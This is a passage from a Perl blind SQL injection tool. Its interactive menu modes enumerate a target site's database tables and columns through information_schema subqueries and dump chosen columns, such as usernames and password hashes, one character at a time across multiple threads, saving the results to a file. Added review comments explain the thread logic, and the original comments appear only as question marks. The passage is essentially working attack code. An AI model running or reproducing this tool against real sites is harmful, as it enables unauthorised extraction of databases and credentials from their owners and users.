  2705.              print "Dump bytes of file from [" . ($num+2) . "] to [" . ($bl_table_number_NIS) . "]\n";
  2706.          }
  2707.          print "-----------------------------------------\n";
  2708.          ## end from2
  2709.          %res1 = ();
  2710.          for(0..$thr) {
  2711.              $trl[$_] = threads->create(\&gets102444);
  2712.          }
  2713.          for(0..$thr) {
  2714.              %res1 = (%res1, %{$trl[$_]->join});
  2715.          }
  2716.          sub gets102444 {
  2717.              $data2 = "";
  2718.              $| = 1;
  2719.              while ($num < $bl_table_number_NIS) {
  2720.                    { lock($num);
  2721.                    $num++; }
  2722.                    $ii = $num;
  2723.                    if ($bl_mode==0){
  2724.                         $data2 = chr(get_res_normal());
  2725.                    } else {
  2726.                         $data2 = chr(get_res_normal1());
  2727.                    }
  2728.                    $hash1{$ii} = $data2;
  2729.                    print $data2;
  2730.              }
  2731.              return \%hash1
  2732.          }
  2733.          return \%res1;
  2734.     }
  2735.     print "----------\n";
  2736.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2737.     close(FILE1);
  2738.     goto START10;
  2739. } # end blind LOAd_FILE
  2740. if ($choice==8) {
  2741.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2742.      print "-----------------------------------\n";
  2743.      ## ???????? ##
  2744.      $bl_lenght = "";
  2745.      $ii = 0;
  2746.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61)";
  2747.             if ($bl_mode==0) {
  2748.                    $bl_lenght = len_check();
  2749.             } else {
  2750.                    $bl_lenght = len_check1();
  2751.             }
  2752.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2753.           print "Count tables NOT in information_schema [length]:" .  $bl_lenght . "\n";
  2754.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2755.                if ($bl_mode==0) {
  2756.                    $bl_table_number_NIS .= get_res_count();
  2757.                } else {
  2758.                    $bl_table_number_NIS .= get_res_count1();
  2759.                }
  2760.                 print $bl_table_number_NIS . "\r";
  2761.                 sleep $pause;
  2762.           }
  2763.           print "\n------------------------------------------------------\n";
  2764.           print "Count tables NOT in information_schema [value]:" . $bl_table_number_NIS . "\n";
  2765.           print "--------------------------------------------------------\n";
  2766.      } else {
  2767.           print "\n------------------------------------------------------\n";
  2768.           print "Cant't get data...\n";
  2769.           print "------------------------------------------------------\n";
  2770.      }
  2771.      $time = localtime;
  2772.      print $time . "\n";
  2773.      print "-----------------------------------\n";
  2774.      ## start from2 ##
  2775.      print FILE1  "-----------------------------------------\n";
  2776.      print FILE1  "Tables - $bl_table_number_NIS\n";
  2777.      print FILE1  "-----------------------------------------\n";
  2778.      print "Normal MODE - records > 10\n";
  2779.      print "Fast MODE - records <= 10\n";
  2780.      print "-----------------------------------------\n";
  2781.      print "Get ALL tables ($bl_table_number_NIS) ? (1/0): ";
  2782.      $choice = <STDIN>;
  2783.      chomp $choice;
  2784.      $thr = $kol_threads; # ???-?? ???????
  2785.      if ($choice == 1) {
  2786.           $num = -1; # ?? ????????
  2787.      } else {
  2788.           print "Enter START_position: ";
  2789.           $choice1 = <STDIN>;
  2790.           chomp $choice1;
  2791.           $num = $choice1-2;
  2792.           print "Enter END_position: ";
  2793.           $choice2 = <STDIN>;
  2794.           chomp $choice2;
  2795.           $bl_table_number_NIS = $choice2-1;
  2796.           print "Dump records from [" . ($num+2) . "] to [" . ($bl_table_number_NIS+1) . "]\n";
  2797.      }
  2798.      print "-----------------------------------------\n";
  2799.      ## end from2
  2800.      print "Request method - $method\n";
  2801.      print "Threads - $kol_threads\n";
  2802.      print "Proxy - $proxy_message\n";
  2803.      print "----------------------\n";
  2804.      TABLES:
  2805.      $time = localtime;
  2806.      print $time . "\n";
  2807.      print "-----------------------------------\n";
  2808.      # ?????? ??????? #
  2809.      $bl_lenght = "";
  2810.      $ii = 0;
  2811.      $s = 0;
  2812.      $mflag = 0;
  2813.      print "-----------------------------------\n";
  2814.      for(0..$thr) {
  2815.          $trl[$_] = threads->create(\&gets102);
  2816.      }
  2817.      for(0..$thr) {
  2818.          $trl[$_]->join;
  2819.      }
  2820.      sub gets102 {
  2821.         $| = 1;
  2822.         while ($num < $bl_table_number_NIS) {
  2823.             { lock($num);
  2824.             $num++; }
  2825.             $sss = $num;
  2826.             $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2827.             if ($bl_mode==0) {
  2828.                    $bl_lenght = len_check();
  2829.             } else {
  2830.                    $bl_lenght = len_check1();
  2831.             }
  2832.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2833.                  print "\ntable limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2834.                  if ($mflag == 1) {
  2835.                      ############################################################
  2836.                      %aa = ();
  2837.                      $aa = gets1000();
  2838.                      $data1 = "";
  2839.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2840.                      #############################################################
  2841.                  } else {
  2842.                    $data1 = "";
  2843.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2844.                     if ($bl_mode==0) {
  2845.                          $data1 .= chr(get_res_normal());
  2846.                     } else {
  2847.                          $data1 .= chr(get_res_normal1());
  2848.                     }
  2849.                       print $data1 . "\r";
  2850.                    }
  2851.                  }
  2852.                  print "\n-----------------------------------\n";
  2853.                  print "  ---> table limit $sss,1: " . $data1 . "\n";
  2854.                  print "-----------------------------------\n";
  2855.                  print FILE1 "  ---> table limit $sss,1: " . $data1 . "\n";
  2856.                  $data = "";
  2857.             }
  2858.             sleep $pause;
  2859.         }
  2860.     }
  2861.     print "----------\n";
  2862.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2863.     close(FILE1);
  2864.     goto START10;
  2865. }
  2866. if ($choice==9) {
  2867.     sub ascii_to_hex ($) {
  2868.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  2869.                $str = "0x" . $str;
  2870.              return $str;
  2871.     }
  2872.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2873.     print "-----------------------------------------\n";
  2874.     print "Enter the table_name: ";
  2875.     $choice = <STDIN>;
  2876.     chomp $choice;
  2877.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2878.     print "Table: $choice\n";
  2879.     print "----------\n";
  2880.     print FILE1  "-----------------------------------------\n";
  2881.     print FILE1  "Table [ $choice ]\n";
  2882.     print FILE1  "-----------------------------------------\n";
  2883.     COLUMNS:
  2884.     $table_name = $choice;
  2885.     $table_name1 = ascii_to_hex $table_name;
  2886.     # ?????? ???-?? ??????? ? ??????? #
  2887.     print "-----------------------------------\n";
  2888.     ## ???????? ##
  2889.     $bl_lenght = "";
  2890.     $ii = 0;
  2891.     $bl_column_number = "";
  2892.     $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
  2893.             if ($bl_mode==0) {
  2894.                    $bl_lenght = len_check();
  2895.             } else {
  2896.                    $bl_lenght = len_check1();
  2897.             }
  2898.     if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2899.         print "Count columns from $table_name [length]:" .  $bl_lenght . "\n";
  2900.         ############################################################
  2901.         for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2902.                if ($bl_mode==0) {
  2903.                    $bl_column_number .= get_res_count();
  2904.                } else {
  2905.                    $bl_column_number .= get_res_count1();
  2906.                }
  2907.                 print $bl_column_number . "\r";
  2908.                 sleep $pause;
  2909.         }
  2910.         print "\n------------------------------------------------------\n";
  2911.         print "Count columns from $table_name [value]:" . $bl_column_number . "\n";
  2912.         print "--------------------------------------------------------\n";
  2913.         if ($bl_column_number <=10 ) {
  2914.               print "Fast MODE - records <= 10\n";
  2915.         } else {
  2916.               print "Normal MODE - records > 10\n";
  2917.         }
  2918.         print "--------------------------------------------------------\n";
  2919.         print FILE1 "Count columns from $table_name:" . $bl_column_number . "\n";
  2920.      } else {
  2921.         print "\n------------------------------------------------------\n";
  2922.         print "Cant't get data...\n";
  2923.         print "------------------------------------------------------\n";
  2924.      }
  2925.      $mflag = 0;
  2926.      print "-----------------------------------\n";
  2927.      $time = localtime;
  2928.      print $time . "\n";
  2929.      print "-----------------------------------\n";
  2930.     ## ?????? ??????? ##
  2931.     print "Request method - $method\n";
  2932.     print "Threads - $kol_threads\n";
  2933.     print "Proxy - $proxy_message\n";
  2934.     print "----------------------\n";
  2935.     # ?????? ??????? #
  2936.     print "----------------------------------------------\n";
  2937.     $thr = $kol_threads; # ???-?? ???????
  2938.     $num = -1; # ?? ????????
  2939.     $bl_lenght = "";
  2940.     $ii = 0;
  2941.     $s = 0;
  2942.     print "Get columns from $table_name:\n";
  2943.     print "-------------------------------------------------------------\n";
  2944.     for(0..$thr) {
  2945.        $trl[$_] = threads->create(\&gets103);
  2946.     }
  2947.     for(0..$thr) {
  2948.        $trl[$_]->join;
  2949.     }
  2950.     $time = localtime;
  2951.     print $time . "\n";
  2952.     sub gets103 {
  2953.         $| = 1;
  2954.         while ($num < $bl_column_number) {
  2955.             { lock($num);
  2956.             $num++; }
  2957.             $sss = $num;
  2958.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2959.             if ($bl_mode==0) {
  2960.                    $bl_lenght = len_check();
  2961.             } else {
  2962.                    $bl_lenght = len_check1();
  2963.             }
  2964.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2965.                  print "\ncolumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2966.                  if ($mflag == 1) {
  2967.                      ############################################################
  2968.                      %aa = ();
  2969.                      $aa = gets1000();
  2970.                      $data1 = "";
  2971.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2972.                      #############################################################
  2973.                  } else {
  2974.                    $data1 = "";
  2975.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2976.                     if ($bl_mode==0) {
  2977.                          $data1 .= chr(get_res_normal());
  2978.                     } else {
  2979.                          $data1 .= chr(get_res_normal1());
  2980.                     }
  2981.                       print $data1 . "\r";
  2982.                    }
  2983.                  }
  2984.                  print "\n-----------------------------------\n";
  2985.                  print "  ---> column limit $sss,1: " . $data1 . "\n";
  2986.                  print "-----------------------------------\n";
  2987.                  print FILE1 "  ---> column limit $sss,1: " . $data1 . "\n";
  2988.                  $data = "";
  2989.             }
  2990.             sleep $pause;
  2991.         }
  2992.     }
  2993.     print FILE1 "----------\n";
  2994.     print "----------\n";
  2995.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2996.     close(FILE1);
  2997.     goto START10;
  2998. }
  2999. if ($choice==10) {
  3000.     $schema_flag = 0;
  3001.     sub ascii_to_hex ($) {
  3002.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3003.                $str = "0x" . $str;
  3004.              return $str;
  3005.     }
  3006.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  3007.     print "-----------------------------------------\n";
  3008.     print "Enter the table_name: ";
  3009.     $choice = <STDIN>;
  3010.     chomp $choice;
  3011.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  3012.     $table_name = $choice;
  3013.     $table_name1 = ascii_to_hex $table_name;
  3014.     print "-----------------------------------------\n";
  3015.     print "MySQL>=5 or MySql<5? (1/0): ";
  3016.     $choice = <STDIN>;
  3017.     chomp $choice;
  3018.     if ($choice == 1) {
  3019.          BL_TABLE_SCHEMA:
  3020.          $schema_flag = 1;
  3021.          print "-----------------------------------------------------\n";
  3022.          print "Getting table_schema for $table_name, wait please... \n";
  3023.          print "-----------------------------------------------------\n";
  3024.          $bl_lenght = "";
  3025.          $bl_table_schema = "";
  3026.          $ii = 0;
  3027.          $bl_current = "(select" . $bl_plus .  "table_schema" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
  3028.             if ($bl_mode==0) {
  3029.                    $bl_lenght = len_check();
  3030.             } else {
  3031.                    $bl_lenght = len_check1();
  3032.             }
  3033.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3034.               print "Table_schema for table user [length]:" .  $bl_lenght . "\n";
  3035.               ############################################################
  3036.               %aa = ();
  3037.               $aa = gets1005();
  3038.               $data1 = "";
  3039.               $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3040.               #############################################################
  3041.               $bl_table_schema = $data1;
  3042.               if ($bl_table_schema =~ m/-/imgs) {$bl_table_schema = "`" . $choice . "`"}
  3043.               $schema_flag = 0;
  3044.               print "\n------------------------------------------------------\n";
  3045.               print "Table_schema for table user [value]:" . $bl_table_schema . "\n";
  3046.          } else {
  3047.               print "\n------------------------------------------------------\n";
  3048.               print "Cant't get data...\n";
  3049.               print "------------------------------------------------------\n";
  3050.          }
  3051.          $table_name = $bl_table_schema . "." . $table_name;
  3052.     }
  3053.     print "-----------------------------------------\n";
  3054.     print "Table: $table_name\n";
  3055.     print "-----------------------------------------\n";
  3056.     ##############################################################################################################
  3057.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  3058.     $choice = <STDIN>;
  3059.     chomp $choice;
  3060.     $column_name = $choice;
  3061.     print FILE1  "-----------------------------------------\n";
  3062.     print FILE1  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3063.     print FILE1  "-----------------------------------------\n";
  3064.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3065.     print "-----------------------------------------\n";
  3066.     print "Do you want add condition to sql-query?\n";
  3067.     print "----------\n";
  3068.     print "for example - where id=1 ? (1/0): ";
  3069.     $choice11 = <STDIN>;
  3070.     chomp $choice11;
  3071.     $condition=0;
  3072.     if ($choice11==1) {
  3073.         print "-----------------------------------------\n";
  3074.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  3075.         print "----------\n";
  3076.         $choice11 = <STDIN>;
  3077.         chomp $choice11;
  3078.         $where = $choice11;
  3079.         print "Your condition: [ where $where ]\n";
  3080.         $condition=1;
  3081.     } else {
  3082.         $condition=0;
  3083.     }
  3084.     if ($condition==0) {
  3085.          $turbo_flag = 0;
  3086.          # ?????? ???-?? ?????? ??????? #
  3087.          print "-----------------------------------\n";
  3088.          print "Count data from [ $table_name  ]:\n";
  3089.          # ?????? ???-?? ?????? ??????? #
  3090.          print "-----------------------------------\n";
  3091.          ## ???????? ##
  3092.          $bl_lenght = "";
  3093.          $ii = 0;
  3094.          $bl_column_number_DATA = "";
  3095.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . ")";
  3096.             if ($bl_mode==0) {
  3097.                    $bl_lenght = len_check();
  3098.             } else {
  3099.                    $bl_lenght = len_check1();
  3100.             }
  3101.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3102.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3103.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3104.                    if ($bl_mode==0) {
  3105.                       $bl_column_number_DATA .= get_res_count();
  3106.                    } else {
  3107.                       $bl_column_number_DATA .= get_res_count1();
  3108.                    }
  3109.                    print $bl_column_number_DATA . "\r";
  3110.                    sleep $pause;
  3111.                 }
  3112.                 print "\n------------------------------------------------------\n";
  3113.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3114.                 print "--------------------------------------------------------\n";
  3115.                 print "Normal MODE - records > 10\n";
  3116.                 print "Fast MODE - records <= 10\n";
  3117.                 print "TURBO-MODE - 1 record, 1 column\n";
  3118.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3119.                 print "-----------------------------------------\n";
  3120.         } else {
  3121.                 print "Cant't get data...\n";
  3122.         }
  3123.         $mflag = 0;
  3124.         print "-----------------------------------\n";
  3125.         $time = localtime;
  3126.         print $time . "\n";
  3127.         print "-----------------------------------\n";
  3128.          ## start from2 ##
  3129.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3130.          $choice = <STDIN>;
  3131.          chomp $choice;
  3132.          $thr = $kol_threads; # ???-?? ???????
  3133.          if ($choice == 1) {
  3134.               $num = -1; # ?? ????????
  3135.          } else {
  3136.               print "Enter START_position: ";
  3137.               $choice1 = <STDIN>;
  3138.               chomp $choice1;
  3139.               $num = $choice1-1;
  3140.               print "Enter END_position: ";
  3141.               $choice2 = <STDIN>;
  3142.               chomp $choice2;
  3143.               $bl_column_number_DATA = $choice2-1;
  3144.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3145.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3146.               if ($rec_number == 0) {
  3147.                  print "\n---------------------------------------------------------------\n";
  3148.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3149.                  ($x,$y) = split (/,/,$column_name);
  3150.                  if ($y) {
  3151.                       "\n---------------------------------------------------------------\n";
  3152.                       print "Sorry, just one column for TURBO-MODE\n";
  3153.                       "---------------------------------------------------------------\n";
  3154.                       $turbo_flag = 0;
  3155.                  } else {
  3156.                       print "\n---------------------------------------------------------------\n";
  3157.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3158.                       $choice_t = <STDIN>;
  3159.                       chomp $choice_t;
  3160.                       if ($choice_t == 1) {
  3161.                              $turbo_flag = 2;
  3162.                              print "=======================================================\n";
  3163.                              print "MD5-TURBO-MODE GRANTED\n";
  3164.                              print "=======================================================\n";
  3165.                       } else {
  3166.                              $turbo_flag = 1;
  3167.                              print "=======================================================\n";
  3168.                              print "TURBO-MODE GRANTED\n";
  3169.                              print "=======================================================\n";
  3170.                       }
  3171.                  }
  3172.  
  3173.               }
  3174.          }
  3175.          print "-----------------------------------------\n";
  3176.          print "Request method - $method\n";
  3177.          print "Threads - $kol_threads\n";
  3178.          print "Proxy - $proxy_message\n";
  3179.          print "----------------------\n";
  3180.          ## end from2
  3181.          # ?????? ?????? ?? ??????? #
  3182.          $bl_lenght = "";
  3183.          $ii = 0;
  3184.          $s = 0;
  3185.          print "Get columns [$column_name] from [$table_name]:\n";
  3186.          print "------------------------\n";
  3187.          for(0..$thr) {
  3188.             $trl[$_] = threads->create(\&gets104);
  3189.          }
  3190.          for(0..$thr) {
  3191.             $trl[$_]->join;
  3192.          }
  3193.          $time = localtime;
  3194.          print $time . "\n";
  3195.          print "----------------------\n";
  3196.          sub gets104 {
                        # Worker-thread body for the "dump rows" mode without a WHERE clause.
                        # Each thread claims the next row index from $num (declared
                        # threads::shared at the top of the file) and rebuilds that row of
                        # $column_name from $table_name one character at a time through the
                        # helpers len_check*/get_res_normal*/gets1000/TURBO/md5, none of which
                        # are defined in this excerpt. Under ithreads every other global it
                        # touches ($bl_current, $bl_lenght, $data1, $sss, $ii, $mflag,
                        # $turbo_flag, $bl_mode, $pause, ...) is this thread's own copy.
                        # Output: one "Record limit N,1" line on STDOUT and in FILE1 per row;
                        # FILE1 is opened by the enclosing mode block, outside this excerpt.
                        # NOTE(review): $sss is read from $num after the lock is released, so
                        # two threads can claim the same row index while another row is skipped.
  3197.                 $| = 1;  # unbuffered STDOUT so the "\r" progress line redraws in place
  3198.                 while ($num < $bl_column_number_DATA) {
  3199.                 { lock($num);
  3200.                 $num++; }  # claim the next row index under the shared lock
  3201.                 $sss = $num;
  3202.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "limit" . $bl_plus . $num . ",1)";  # row subquery read by the length/character probes
  3203.                 if ($turbo_flag == 2) {
  3204.                     $bl_lenght = 32;  # MD5-TURBO mode assumes a 32-character hash and skips the length probe
  3205.                 } else {
  3206.                      if ($bl_mode==0) {
  3207.                          $bl_lenght = len_check();
  3208.                      } else {
  3209.                          $bl_lenght = len_check1();
  3210.                      }
  3211.                 }
  3212.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {  # plausibility window; anything else is treated as "no data"
  3213.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
  3214.                       if ($mflag == 1) {
  3215.                           ############################################################
  3216.                           %aa = ();  # NOTE(review): %aa (hash) is unrelated to the $aa hashref below; this reset is dead code
  3217.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3218.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3219.                           if ($turbo_flag == 2) {$aa = md5();}
  3220.                           $data1 = "";
  3221.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;  # join the returned hashref's values in ascending numeric key order
  3222.                           #############################################################
  3223.                       } else {
  3224.                           $data1 = "";
  3225.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {  # per-character reconstruction; the helpers return a character code
  3226.                              if ($bl_mode==0) {
  3227.                                 $data1 .= chr(get_res_normal());
  3228.                              } else {
  3229.                                 $data1 .= chr(get_res_normal1());
  3230.                              }
  3231.                               print $data1 . "\r";
  3232.                           }
  3233.                       }
  3234.                       print "\n-----------------------------------\n";
  3235.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3236.                       print "-----------------------------------\n";
  3237.                       print FILE1 "  ---> Record limit $sss,1: " . $data1 . "\n";  # every thread appends to the same handle
  3238.                 }
  3239.                 sleep $pause;  # delay between rows
  3240.                 }
  3241.          }
  3242.          print "----------\n";
  3243.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3244.          close(FILE1);
  3245.          goto START10;
  3246.     } else {
  3247.     ## ?????? ?????? ?? ??????? ##
  3248.          $turbo_flag = 0;
  3249.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  3250.          # ?????? ???-?? ?????? ??????? #
  3251.          print "-----------------------------------\n";
  3252.          ## ???????? ##
  3253.          $bl_lenght = "";
  3254.          $ii = 0;
  3255.          $bl_column_number_DATA = "";
  3256.  
  3257.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . ")";
  3258.             if ($bl_mode==0) {
  3259.                    $bl_lenght = len_check();
  3260.             } else {
  3261.                    $bl_lenght = len_check1();
  3262.             }
  3263.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3264.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3265.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3266.                    if ($bl_mode==0) {
  3267.                       $bl_column_number_DATA .= get_res_count();
  3268.                    } else {
  3269.                       $bl_column_number_DATA .= get_res_count1();
  3270.                    }
  3271.                    print $bl_column_number_DATA . "\r";
  3272.                    sleep $pause;
  3273.                 }
  3274.                 print "\n------------------------------------------------------\n";
  3275.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3276.                 print "--------------------------------------------------------\n";
  3277.                 print "Normal MODE - records > 10\n";
  3278.                 print "Fast MODE - records <= 10\n";
  3279.                 print "TURBO-MODE - 1 record, 1 column\n";
  3280.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3281.                 print "-----------------------------------------\n";
  3282.         } else {
  3283.                 print "\n------------------------------------------------------\n";
  3284.                 print "Cant't get data...\n";
  3285.                 print "------------------------------------------------------\n";
  3286.         }
  3287.         print "-----------------------------------\n";
  3288.         $mflag = 0;
  3289.         $time = localtime;
  3290.         print $time . "\n";
  3291.         print "-----------------------------------\n";
  3292.          ## start from2 ##
  3293.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3294.          $choice = <STDIN>;
  3295.          chomp $choice;
  3296.          $thr = $kol_threads; # ???-?? ???????
  3297.          if ($choice == 1) {
  3298.               $num = -1; # ?? ????????
  3299.          } else {
  3300.               print "Enter START_position: ";
  3301.               $choice1 = <STDIN>;
  3302.               chomp $choice1;
  3303.               $num = $choice1-1;
  3304.               print "Enter END_position: ";
  3305.               $choice2 = <STDIN>;
  3306.               chomp $choice2;
  3307.               $bl_column_number_DATA = $choice2-1;
  3308.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3309.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3310.               if ($rec_number == 0) {
  3311.                  print "\n---------------------------------------------------------------\n";
  3312.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3313.                  ($x,$y) = split (/,/,$column_name);
  3314.                  if ($y) {
  3315.                       "\n---------------------------------------------------------------\n";
  3316.                       print "Sorry, just one column for TURBO-MODE\n";
  3317.                       "---------------------------------------------------------------\n";
  3318.                       $turbo_flag = 0;
  3319.                  } else {
  3320.                       print "\n---------------------------------------------------------------\n";
  3321.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3322.                       $choice_t = <STDIN>;
  3323.                       chomp $choice_t;
  3324.                       if ($choice_t == 1) {
  3325.                              $turbo_flag = 2;
  3326.                              print "=======================================================\n";
  3327.                              print "MD5-TURBO-MODE GRANTED\n";
  3328.                              print "=======================================================\n";
  3329.                       } else {
  3330.                              $turbo_flag = 1;
  3331.                              print "=======================================================\n";
  3332.                              print "TURBO-MODE GRANTED\n";
  3333.                              print "=======================================================\n";
  3334.                       }
  3335.                  }
  3336.  
  3337.               }
  3338.          }
  3339.          print "-----------------------------------------\n";
  3340.          print "Request method - $method\n";
  3341.          print "Threads - $kol_threads\n";
  3342.          print "Proxy - $proxy_message\n";
  3343.          print "----------------------\n";
  3344.          ## end from2
  3345.          # ?????? ?????? ?? ??????? #
  3346.          $bl_lenght = "";
  3347.          $ii = 0;
  3348.          $s = 0;
  3349.          print "Get columns from $table_name:\n";
  3350.          print "------------------------\n";
  3351.          for(0..$thr) {
  3352.             $trl[$_] = threads->create(\&gets105);
  3353.          }
  3354.          for(0..$thr) {
  3355.             $trl[$_]->join;
  3356.          }
  3357.          $time = localtime;
  3358.          print $time . "\n";
  3359.          print "----------------------\n";
  3360.          sub gets105 {
                        # Worker-thread body for the "dump rows" mode with a WHERE clause.
                        # Identical to gets104 except that $where is spliced into the row
                        # subquery. Each thread claims the next row index from $num (declared
                        # threads::shared at the top of the file) and rebuilds that row of
                        # $column_name from $table_name character by character through the
                        # helpers len_check*/get_res_normal*/gets1000/TURBO/md5, none of which
                        # are defined in this excerpt. All other globals are per-thread copies.
                        # Output: one "Record limit N,1" line on STDOUT and in FILE1 per row;
                        # FILE1 is opened by the enclosing mode block, outside this excerpt.
                        # NOTE(review): $sss is read from $num after the lock is released, so
                        # two threads can claim the same row index while another row is skipped.
  3361.                 $| = 1;  # unbuffered STDOUT so the "\r" progress line redraws in place
  3362.                 while ($num < $bl_column_number_DATA) {
  3363.                 { lock($num);
  3364.                 $num++; }  # claim the next row index under the shared lock
  3365.                 $sss = $num;
  3366.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . $bl_plus . "limit" . $bl_plus . $num . ",1)";  # row subquery read by the length/character probes
  3367.                 if ($turbo_flag == 2) {
  3368.                     $bl_lenght = 32;  # MD5-TURBO mode assumes a 32-character hash and skips the length probe
  3369.                 } else {
  3370.                     if ($bl_mode==0) {
  3371.                        $bl_lenght = len_check();
  3372.                     } else {
  3373.                        $bl_lenght = len_check1();
  3374.                     }  
  3375.                 }
  3376.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {  # plausibility window; anything else is treated as "no data"
  3377.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
  3378.                       if ($mflag == 1) {
  3379.                           ############################################################
  3380.                           %aa = ();  # NOTE(review): %aa (hash) is unrelated to the $aa hashref below; this reset is dead code
  3381.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3382.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3383.                           if ($turbo_flag == 2) {$aa = md5();}
  3384.                           $data1 = "";
  3385.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;  # join the returned hashref's values in ascending numeric key order
  3386.                           #############################################################
  3387.                       } else {
  3388.                           $data1 = "";
  3389.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {  # per-character reconstruction; the helpers return a character code
  3390.                              if ($bl_mode==0) {
  3391.                                 $data1 .= chr(get_res_normal());
  3392.                              } else {
  3393.                                 $data1 .= chr(get_res_normal1());
  3394.                              }
  3395.                               print $data1 . "\r";
  3396.                           }
  3397.                       }
  3398.                       print "\n-----------------------------------\n";
  3399.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3400.                       print "-----------------------------------\n";
  3401.                       print FILE1 "  ---> Record limit $sss,1: " . $data1. "\n";  # every thread appends to the same handle
  3402.                 }
  3403.                 sleep $pause;  # delay between rows
  3404.                 }
  3405.          }
  3406.          print "----------\n";
  3407.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3408.          close(FILE1);
  3409.          goto START10;
  3410.     }
  3411. }
  3412. if ($choice==11) {
           # Blind-mode menu item 11: wordlist-driven existence checks for table
           # names ([1]) and column names ([2]). Each item re-enters this menu via
